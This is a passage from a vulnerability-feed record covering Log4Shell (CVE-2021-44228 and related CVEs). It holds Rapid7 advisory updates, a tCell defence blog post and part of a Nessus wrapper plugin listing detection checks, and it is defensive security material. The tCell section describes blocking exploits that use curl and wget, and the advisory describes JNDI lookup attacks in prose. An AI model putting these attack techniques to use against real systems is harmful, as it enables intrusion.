advisory with information on a separate version stream of Log4j vulnerable to CVE-2021-44228. 
They have issued a fix for the vulnerability in version 2.12.2 as well as 2.16.0. We are investigating the feasibility of InsightVM and Nexpose coverage for this additional version stream.\n\nVersion 6.6.120 of the Scan Engine and Console is now available to InsightVM and Nexpose customers and includes improvements to the authenticated Linux check for CVE-2021-44228.\n\n[December 17, 2021 09:30 ET] \nAn "external resources" section has been added that includes non-Rapid7 resources on Log4j/Log4Shell that may be of use to customers and the community.\n\nCVE-2021-45046 has been escalated from a CVSS score of 3.7 to 9.0 on the [Apache Foundation website](<https://logging.apache.org/log4j/2.x/security.html>). The vulnerability was designated when it became clear that the fix for CVE-2021-44228 was \u201cincomplete in certain non-default configurations\u201d and has now been upgraded in severity due to reports that it not only allows for DoS attacks, but also information leaks and in some specific cases, RCE (currently being [reported for macOS](<https://twitter.com/GossiTheDog/status/1471791074314276867?s=20>)). No in-the-wild exploitation of this RCE is currently being publicly reported. The fix for this is the [Log4j 2.16](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) update released on December 13. If you have not upgraded to this version, we strongly recommend you do so, though we note that if you are on v2.15 (the original fix released by Apache), you will be covered in most scenarios. Update to 2.16 when you can, but don\u2019t panic that you have no coverage. \nCVE-2021-45046 is an issue in situations when a logging configuration uses a non-default Pattern Layout with a Context Lookup. 
In this case, attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern.\n\n[December 17, 12:15 PM ET] \nStarting in version 6.6.121 released December 17, 2021, we have updated product functionality to allow InsightVM and Nexpose customers to scan for the Apache Log4j (Log4Shell) vulnerability on Windows devices with the authenticated check for CVE-2021-44228. This update now gives customers the option to enable Windows File System Search to allow scan engines to search all local file systems for specific files on Windows assets. Customers should ensure they are running version 6.6.121 of their Scan Engines and Consoles and enable Windows File System Search in the scan template. The update to 6.6.121 requires a restart.\n\nNote: Searching entire file systems across Windows assets is an intensive process that may increase scan time and resource utilization. To allow this, you can enable Windows file system searching in the scan template in order to use the authenticated check for Log4j on Windows systems.\n\nIn some cases, customers who have enabled the \u201cSkip checks performed by the Agent\u201d option in the scan template may see that the Scan Engine has skipped authenticated vulnerability checks. If you have the Insight Agent running in your environment, you can uncheck \u201cSkip checks performed by the Agent\u201d option in the scan template to ensure that authenticated checks run on Windows systems.\n\n[December 17, 4:50 PM ET] \nInsight Agent collection on Windows for Log4j has begun rolling out in version 3.1.2.38 as of December 17, 2021. It will take several days for this roll-out to complete. 
If you are using the Insight Agent to assess your assets for vulnerabilities and you are not yet on version 3.1.2.38, you can uncheck the \u201c[Skip checks performed by the Agent](<https://docs.rapid7.com/insightvm/enable-complementary-scanning-for-scan-engines-and-insight-agents/>)\u201d option in the scan template to ensure that authenticated checks run on Windows systems.\n\nRead more about scanning for Log4Shell [here](<https://docs.rapid7.com/insightvm/apache-log4j/>).\n\n[December 17, 2021, 6 PM ET] \nReports are coming in of ransomware group, Conti, leveraging CVE-2021-44228 (Log4Shell) to mount attacks. According to a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) from AdvIntel, the group is testing exploitation by targeting vulnerable Log4j2 instances in VMware vCenter \u201cfor lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.\u201d Expect more widespread ransom-based exploitation to follow in coming weeks.\n\n[December 20, 2021 8:50 AM ET] \nAdded an entry in "External Resources" to [CISA's maintained list of affected products/services](<https://github.com/cisagov/log4j-affected-db>).\n\n[December 20, 2021 1:30 PM ET] \nInsightVM and Nexpose customers can assess their exposure to CVE-2021-45105 as of December 20, 2021 with an authenticated vulnerability check. CVE-2021-45105 is a Denial of Service (DoS) vulnerability that was fixed in Log4j version 2.17.0. Our check for this vulnerability is supported in on-premise and agent scans (including for Windows). \nContent update: `ContentOnly-content-1.1.2361-202112201646` \nJarID: 3961186789\n\nPlease note that Apache's guidance as of December 17, 2021 is to update to version 2.17.0 of Log4j. 
While this is good guidance, given the severity of the original CVE-2021-44228, **organizations should prioritize ensuring all Log4j versions have been updated to at least 2.16.0.**\n\n[December 22, 2021] \nRapid7 has released a new Out of Band Injection Attack template to test for Log4Shell in InsightAppSec. Learn more about the details [here](<https://www.rapid7.com/blog/post/2021/12/22/test-for-log4shell-with-insightappsec-using-new-functionality/>).\n\n[December 23, 2021] \nApache has released Log4j 2.12.3 for Java 7 users and 2.3.1 for Java 6 users to mitigate Log4Shell-related vulnerabilities. Notably, both Java 6 and Java 7 are end-of-life (EOL) and unsupported; we strongly recommend upgrading to Java 8 or later. If you cannot update to a supported version of Java, you should ensure you are running Log4j 2.12.3 or 2.3.1.\n\n[December 28, 2021] \nApache has [released](<https://logging.apache.org/log4j/2.x/security.html>) Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7), and 2.3.2 (Java 6) to mitigate a new vulnerability. CVE-2021-44832 is of moderate severity (CVSSv3 6.6) and exists only in a non-default configuration that requires the attacker to have control over Log4j configuration. **This is an extremely unlikely scenario.** Applications do not, as a rule, allow remote attackers to modify their logging configuration files. While keeping up-to-date on Log4j versions is a good strategy in general, organizations should not let undue hype on CVE-2021-44832 derail their progress on mitigating the real risk by ensuring CVE-2021-44228 is fully remediated.\n\n[January 3, 2022] \nInsightVM and Nexpose customers can assess their exposure to Log4j CVE-2021-44832 with an [authenticated vulnerability check](<https://www.rapid7.com/db/vulnerabilities/apache-log4j-core-cve-2021-44832/>) as of December 31, 2021. 
Please note that as we emphasized above, organizations should not let this new CVE, which is significantly overhyped, derail progress on mitigating CVE-2021-44228.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T15:30:00", "type": "rapid7blog", "title": "Widespread Exploitation of Critical Remote Code Execution in Apache Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-10T15:30:00", "id": "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "href": "https://blog.rapid7.com/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-20T21:04:01", "description": "\n\nBy now, we\u2019re sure you\u2019re familiar with all things 
[Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) \u2013 but we want to make sure we share how to protect your applications. Applications are a critical part of any organization\u2019s attack surface, and we\u2019re seeing thousands of Log4Shell attack attempts in our customers' environments every hour. Let\u2019s walk through the various ways [tCell](<https://www.rapid7.com/products/tcell/>) can help our customers protect against Log4Shell attacks.\n\n## 1\\. Monitor for any Log4Shell attack attempts\n\ntCell is a web application and API protection solution that has traditional web application firewall monitoring capabilities such as monitoring attacks. Over the weekend, we launched a new App Firewall detection for all tCell customers. This means tCell customers can leverage our App Firewall functionality to determine if any Log4Shell attack attempts have taken place. From there, customers can also drill in to more information on the events that took place. We\u2019ve created a video to walk you through how to detect Log4Shell attack attempts using the App Firewall feature in tCell.\n\n\n\nAs a reminder, customers will need to make sure they have deployed the JVM agent on their apps to begin monitoring their applications\u2019 activity. Make sure to check out our [Quick Start Guide](<https://docs.rapid7.com/tcell/quick-start-guide>) if you need help setting up tCell. \n\n\n## 2\\. Block against Log4Shell attacks \n\n\nMonitoring is great, but what you may be looking for is something that protects your application by blocking Log4Shell attack attempts. In order to do this, we\u2019ve added a default pattern (**tc-cmdi-4**) for customers to block against. 
Below is a video on how to set up this custom block rule, or reach out to the tCell team if you need any assistance rolling this out at large.\n\n\n\nAs research continues and new patterns are identified, we will provide updates to **tc-cdmi-4** to improve coverage. Customers have already noted how the new default pattern is providing more protection coverage than yesterday. \n\n\n## 3\\. Identify vulnerable packages (such as CVE 2021-44228)\n\n \nWe\u2019ve heard from customers that they\u2019re unsure of whether or not their applications are leveraging the vulnerable package. With tCell, we will alert you if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as [**CVE 2021-44228**](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) and [**CVE 2021-45046**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)) are loaded by the application at runtime. The best way to eliminate the risk exposure for Log4Shell is to upgrade any vulnerable packages to 2.17. Check out the video below for more information.\n\n\n\n \nIf you would like to provide additional checks outside of the vulnerable packages check at runtime, please refer to our blog on how [InsightVM can help you do this](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>). \n\n\n## 4\\. Enable OS commands\n\nOne of the benefits of using tCell\u2019s app server agents is the fact that you can enable blocking for [OS commands](<https://docs.rapid7.com/tcell/os-commands>). This will prevent a wide range of exploits leveraging things like curl, wget, etc. Below you\u2019ll find a picture of how to enable OS commands (either report only or block and report).\n\n\n\n## 5\\. 
Detect and block suspicious actors \n\nAll events that are detected by the App Firewall in tCell are fed into the analytics engine to determine [Suspicious Actors](<https://docs.rapid7.com/tcell/sql-injection/>). The Suspicious Actors feature takes in multiple inputs (such as failed logins, injections, unusual inputs, etc.) and correlates these to an IP address.\n\n\n\nNot only can you monitor for suspicious actors with tCell, but you can also configure tCell to block all activity or just the suspicious activity from the malicious actor\u2019s IP.\n\n\n\n## All the components together make the magic happen\n\nThe power of tCell isn\u2019t in one or two features, but rather its robust capability set, which we believe is required to secure any environment with a defense-in-depth approach. We will help customers not only identify vulnerable Log4j packages that are being used, but also assist with monitoring for suspicious activity and block attacks. The best security is when you have multiple types of defenses available to protect against bad actors, and this is why using the capabilities mentioned here will prove to be valuable in protecting against Log4Shell and future threats.\n\n#### Get more critical insights about defending against Log4Shell\n\n[Check out our resource center](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T14:58:14", "type": "rapid7blog", "title": "How to Protect Your Applications Against Log4Shell With tCell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-15T14:58:14", "id": "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "href": "https://blog.rapid7.com/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-03-17T17:41:15", "description": "This plugin was used in the scan template 'Log4Shell Vulnerability Ecosystem' (prior to 2/2/2022) as a way to include other plugins related to the Log4j vulnerabilities CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, and CVE-2021-4104, including those based on patches from other vendors.\n - 156932 VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\n - 156054 Ubuntu 18.04 LTS / 20.04 LTS : Apache Log4j 2 vulnerability (USN-5192-1)\n - 156026 FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)\n - 156115 Apache Log4Shell RCE detection via callback correlation (Direct Check FTP)\n - 156558 Apache JSPWiki Log4Shell Direct Check (CVE-2021-44228)\n - 156327 Apache Log4j 2.0 < 2.3.2 / 2.4 < 2.12.4 / 2.13 < 2.17.1 RCE\n - 156232 Apache Log4Shell RCE detection via callback correlation (Direct Check SMB)\n - 156157 Apache Log4Shell RCE detection via callback correlation (Direct Check POP3)\n - 156132 Apache Log4Shell RCE detection via callback correlation (Direct Check SMTP)\n - 156018 Debian DLA-2842-1 : apache-log4j2 - LTS security update\n - 156161 Ubuntu 16.04 LTS : Apache Log4j 2 vulnerability 
(USN-5192-2)\n - 156032 Log4j EOL / Unsupported Apache Log4j Unsupported Version Detection\n - 156157 Apache Log4Shell RCE detection via callback correlation (Direct Check IMAP)\n - 156941 MobileIron Core Log4Shell Direct Check (CVE-2021-44228)\n - 156258 Apache Log4Shell RCE detection via callback correlation (Direct Check NTP)\n - 156016 Apache Log4Shell RCE detection via Path Enumeration (Direct Check HTTP)\n - 156871 Amazon Linux AMI : log4j (ALAS-2022-1562)\n - 156182 Amazon Linux 2 : java-17-amazon-corretto, java-11-amazon-corretto, java-1.8.0-openjdk, java-1.7.0-openjdk (ALAS-2021-1731)\n - 156166 Apache Log4Shell RCE detection via callback correlation (Direct Check SSH)\n - 156375 Apache Log4Shell RCE detection via callback correlation (Direct Check UPnP)\n - 156139 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4107-1)\n - 157137 Oracle Linux 6 : log4j (ELSA-2022-9056)\n - 156197 Apache Log4Shell RCE detection via callback correlation (Direct Check NetBIOS)\n - 156015 Debian DSA-5020-1 : apache-log4j2 - security update\n - 156169 SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)\n - 156559 Apache Log4Shell RCE detection via callback correlation (Direct Check RPCBIND)\n - 156218 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1601-1)\n - 156112 Amazon Linux 2 : aws-kinesis-agent (ALAS-2021-1730)\n - 156014 Apache Log4Shell RCE detection via callback correlation (Direct Check HTTP)\n - 156174 Amazon Linux AMI : java-1.8.0-openjdk, java-1.7.0-openjdk, java-1.6.0-openjdk (ALAS-2021-1553)\n - 156164 Apache Log4Shell CVE-2021-45046 Bypass Remote Code Execution\n - 156052 FreeBSD : bastillion -- log4j vulnerability (515df85a-5cd7-11ec-a16d-001517a2e1a4)\n - 156257 Apache Log4Shell RCE detection via callback correlation (Direct Check DNS)\n - 156455 Apache Log4Shell RCE detection via callback correlation (Direct Check PPTP)\n - 156002 Apache Log4j < 2.15.0 Remote Code Execution\n - 156158 Apache Log4Shell RCE detection via callback correlation 
(Direct Check Telnet)\n - 156669 Apache Log4Shell RCE detection via callback correlation (Direct Check MSRPC)\n - 156324 FreeBSD : OpenSearch -- Log4Shell (b0f49cb9-6736-11ec-9eea-589cfc007716)\n - 156078 FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)\n - 156560 VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\n - 156473 Apache OFBiz Log4Shell Direct Check (CVE-2021-44228)\n - 156146 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)\n - 156124 Debian DSA-5022-1 : apache-log4j2 - security update\n - 156177 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)\n - 157159 Oracle Linux 8 : parfait:0.5 (ELSA-2022-0290)\n - 156145 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:3999-1)\n - 156256 Apache Log4Shell RCE detection via callback correlation (Direct Check SNMP)\n - 156172 SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)\n - 156276 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)\n - 156181 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)\n - 156103 Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)\n - 156165 Apache Log4j 2.x < 2.16.0 RCE (MacOS)\n - 156210 FreeBSD : graylog -- remote code execution in log4j from user-controlled log input (650734b2-7665-4170-9a0a-eeced5e10a5e)\n - 156035 VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\n - 156183 Apache Log4j 2.x < 2.17.0 DoS\n - 156104 Ubuntu 20.04 LTS : Apache Log4j 2 vulnerability (USN-5197-1)\n - 156441 Ubiquiti UniFi Network Log4Shell Direct Check (CVE-2021-44228)\n - 156891 Oracle Primavera P6 Enterprise Project Portfolio Management (Jan 2022 CPU)\n - 156753 Apache Druid Log4Shell Direct Check (CVE-2021-44228)\n - 156175 Amazon Linux 2 : java-1.8.0-amazon-corretto (ALAS-2021-001)\n - 156712 Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache Log4j 1.2 vulnerability (USN-5223-1)\n - 156000 Apache Log4j Installed (Unix)\n - 
156167 SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)\n - 156056 Apache Log4Shell RCE detection via Raw Socket Logging (Direct Check)\n - 156021 FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\n - 156153 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4094-1)\n - 156893 Oracle Primavera Gateway (Jan 2022 CPU)\n - 156471 Apache Solr Log4Shell Direct Check (CVE-2021-44228)\n - 156340 openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)\n - 156150 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)\n - 156180 openSUSE 15 Security Update : logback (openSUSE-SU-2021:4109-1)\n - 156264 Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2021-1554)\n - 156170 SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)\n - 155999 Apache Log4j < 2.15.0 Remote Code Execution\n - 156206 Oracle Linux 7 : log4j (ELSA-2021-5206)\n - 156001 Apache Log4j JAR Detection (Windows)\n - 155998 Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check)\n - 156057 Apache Log4j 2.x < 2.16.0 RCE\n - 156279 openSUSE 15 Security Update : logback (openSUSE-SU-2021:1613-1)\n - 156017 SIP Script Remote Command Execution via log4shell", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "Log4Shell Ecosystem Wrapper", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45056"], "modified": "2022-02-02T00:00:00", "cpe": [], "id": "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "href": "https://www.tenable.com/plugins/nessus/156061", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nvar script_names_filenames = {\n \"155998 Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check)\": \"apache_log4j_jdni_ldap_generic.nbin\",\n \"155999 Apache Log4j < 2.15.0 Remote Code Execution\": 
\"apache_log4j_2_15_0.nasl\",\n \"156000 Apache Log4j Installed (Unix)\": \"apache_log4j_nix_installed.nbin\",\n \"156001 Apache Log4j JAR Detection (Windows)\": \"apache_log4j_win_installed.nbin\",\n \"156002 Apache Log4j < 2.15.0 Remote Code Execution\": \"apache_log4j_win_2_15_0.nasl\",\n \"156014 Apache Log4Shell RCE detection via callback correlation (Direct Check HTTP)\": \"apache_log4j_jdni_ldap_generic_http_headers.nbin\",\n \"156017 SIP Script Remote Command Execution via log4shell\": \"log4j_log4shell_sip_invite.nbin\",\n \"156016 Apache Log4Shell RCE detection via Path Enumeration (Direct Check HTTP)\": \"log4j_log4shell_www.nbin\",\n \"156035 VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\": \"vmware_vcenter_log4shell.nbin\",\n \"156032 Log4j EOL / Unsupported Apache Log4j Unsupported Version Detection\": \"apache_log4j_unsupported.nasl\",\n \"156056 Apache Log4Shell RCE detection via Raw Socket Logging (Direct Check)\": \"apache_log4j_jndi_ldap_generic_raw.nbin\",\n \"156057 Apache Log4j 2.x < 2.16.0 RCE\": \"apache_log4j_2_16_0.nasl\",\n \"156103 Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)\": \"apache_log4j_1_2.nasl\",\n \"156157 Apache Log4Shell RCE detection via callback correlation (Direct Check POP3)\": \"apache_log4j_jdni_ldap_generic_telnet.nbin\",\n \"156157 Apache Log4Shell RCE detection via callback correlation (Direct Check IMAP)\": \"apache_log4shell_pop3.nbin\",\n \"156158 Apache Log4Shell RCE detection via callback correlation (Direct Check Telnet)\": \"apache_log4shell_imap.nbin\",\n \"156132 Apache Log4Shell RCE detection via callback correlation (Direct Check SMTP)\": \"apache_log4shell_smtp.nbin\",\n \"156164 Apache Log4Shell CVE-2021-45046 Bypass Remote Code Execution\": \"apache_log4shell_CVE-2021-45056_direct_check.nbin\",\n \"156112 Amazon Linux 2 : aws-kinesis-agent (ALAS-2021-1730)\": \"al2_ALAS-2021-1730.nasl\",\n \"156124 Debian DSA-5022-1 : apache-log4j2 - security update\": 
\"debian_DSA-5022.nasl\",\n \"156104 Ubuntu 20.04 LTS : Apache Log4j 2 vulnerability (USN-5197-1)\": \"ubuntu_USN-5197-1.nasl\",\n \"156018 Debian DLA-2842-1 : apache-log4j2 - LTS security update\": \"debian_DLA-2842.nasl\",\n \"156015 Debian DSA-5020-1 : apache-log4j2 - security update\": \"debian_DSA-5020.nasl\",\n \"156021 FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\": \"freebsd_pkg_3fadd7e4f8fb45a0a2188fd6423c338f.nasl\",\n \"156026 FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)\": \"freebsd_pkg_4b1ac5a35bd411ec8602589cfc007716.nasl\",\n \"156078 FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)\": \"freebsd_pkg_1ea05bb85d7411ecbb1e001517a2e1a4.nasl\",\n \"156054 Ubuntu 18.04 LTS / 20.04 LTS : Apache Log4j 2 vulnerability (USN-5192-1)\": \"ubuntu_USN-5192-1.nasl\",\n \"156052 FreeBSD : bastillion -- log4j vulnerability (515df85a-5cd7-11ec-a16d-001517a2e1a4)\": \"freebsd_pkg_515df85a5cd711eca16d001517a2e1a4.nasl\",\n \"156115 Apache Log4Shell RCE detection via callback correlation (Direct Check FTP)\": \"log4j_log4shell_ftp.nbin\",\n \"156166 Apache Log4Shell RCE detection via callback correlation (Direct Check SSH)\": \"apache_log4shell_ssh.nbin\",\n \"156153 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4094-1)\": \"openSUSE-2021-4094.nasl\",\n \"156139 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4107-1)\": \"openSUSE-2021-4107.nasl\",\n \"156165 Apache Log4j 2.x < 2.16.0 RCE (MacOS)\": \"apache_log4j_2_16_0_mac.nasl\",\n \"156146 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)\": \"openSUSE-2021-1577.nasl\",\n \"156150 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)\": \"openSUSE-2021-1586.nasl\",\n \"156145 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:3999-1)\": \"openSUSE-2021-3999.nasl\",\n \"156161 Ubuntu 16.04 LTS : Apache Log4j 2 vulnerability (USN-5192-2)\": \"ubuntu_USN-5192-2.nasl\",\n 
\"156183 Apache Log4j 2.x < 2.17.0 DoS\": \"apache_log4j_2_17_0.nasl\",\n \"156175 Amazon Linux 2 : java-1.8.0-amazon-corretto (ALAS-2021-001)\": \"al2_ALAS-2021-001.nasl\",\n \"156174 Amazon Linux AMI : java-1.8.0-openjdk, java-1.7.0-openjdk, java-1.6.0-openjdk (ALAS-2021-1553)\": \"ala_ALAS-2021-1553.nasl\",\n \"156182 Amazon Linux 2 : java-17-amazon-corretto, java-11-amazon-corretto, java-1.8.0-openjdk, java-1.7.0-openjdk (ALAS-2021-1731)\": \"al2_ALAS-2021-1731.nasl\",\n \"156180 openSUSE 15 Security Update : logback (openSUSE-SU-2021:4109-1)\": \"openSUSE-2021-4109.nasl\",\n \"156177 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)\": \"openSUSE-2021-4111.nasl\",\n \"156181 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)\": \"openSUSE-2021-4112.nasl\",\n \"156167 SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)\": \"suse_SU-2021-14866-1.nasl\",\n \"156169 SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)\": \"suse_SU-2021-4111-1.nasl\",\n \"156172 SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)\": \"suse_SU-2021-4112-1.nasl\",\n \"156170 SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)\": \"suse_SU-2021-4115-1.nasl\",\n \"156197 Apache Log4Shell RCE detection via callback correlation (Direct Check NetBIOS)\": \"apache_log4shell_netbios.nbin\",\n \"156206 Oracle Linux 7 : log4j (ELSA-2021-5206)\": \"oraclelinux_ELSA-2021-5206.nasl\",\n \"156218 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1601-1)\": \"openSUSE-2021-1601.nasl\",\n \"156210 FreeBSD : graylog -- remote code execution in log4j from user-controlled log input (650734b2-7665-4170-9a0a-eeced5e10a5e)\": \"freebsd_pkg_650734b2766541709a0aeeced5e10a5e.nasl\",\n \"156232 Apache Log4Shell RCE detection via callback correlation (Direct Check SMB)\": \"log4j_log4shell_smb.nbin\",\n \"156258 Apache Log4Shell RCE detection via callback correlation (Direct Check NTP)\": \"log4j_log4shell_ntp.nbin\",\n \"156257 Apache 
Log4Shell RCE detection via callback correlation (Direct Check DNS)\": \"apache_log4shell_dns.nbin\",\n \"156256 Apache Log4Shell RCE detection via callback correlation (Direct Check SNMP)\": \"apache_log4shell_snmp.nbin\",\n \"156279 openSUSE 15 Security Update : logback (openSUSE-SU-2021:1613-1)\": \"openSUSE-2021-1613.nasl\",\n \"156276 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)\": \"openSUSE-2021-1612.nasl\",\n \"156324 FreeBSD : OpenSearch -- Log4Shell (b0f49cb9-6736-11ec-9eea-589cfc007716)\": \"freebsd_pkg_b0f49cb9673611ec9eea589cfc007716.nasl\",\n \"156327 Apache Log4j 2.0 < 2.3.2 / 2.4 < 2.12.4 / 2.13 < 2.17.1 RCE\": \"apache_log4j_2_17_1.nasl\",\n \"156264 Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2021-1554)\": \"ala_ALAS-2021-1554.nasl\",\n \"156375 Apache Log4Shell RCE detection via callback correlation (Direct Check UPnP)\": \"apache_log4shell_upnp.nbin\",\n \"156340 openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)\": \"openSUSE-2021-1631.nasl\",\n \"156441 Ubiquiti UniFi Network Log4Shell Direct Check (CVE-2021-44228)\": \"ubiquiti_unifi_network_log4shell.nbin\",\n \"156455 Apache Log4Shell RCE detection via callback correlation (Direct Check PPTP)\": \"log4j_log4shell_pptp.nbin\",\n \"156471 Apache Solr Log4Shell Direct Check (CVE-2021-44228)\": \"apache_solr_log4shell.nbin\",\n \"156473 Apache OFBiz Log4Shell Direct Check (CVE-2021-44228)\": \"apache_ofbiz_log4shell.nbin\",\n \"156560 VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\": \"vmware_horizon_log4shell.nbin\",\n \"156558 Apache JSPWiki Log4Shell Direct Check (CVE-2021-44228)\": \"apache_jspwiki_log4shell.nbin\",\n \"156559 Apache Log4Shell RCE detection via callback correlation (Direct Check RPCBIND)\": \"log4j_log4shell_rpcbind.nbin\",\n \"156669 Apache Log4Shell RCE detection via callback correlation (Direct Check MSRPC)\": \"apache_log4shell_msrpc.nbin\",\n \"156712 Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache 
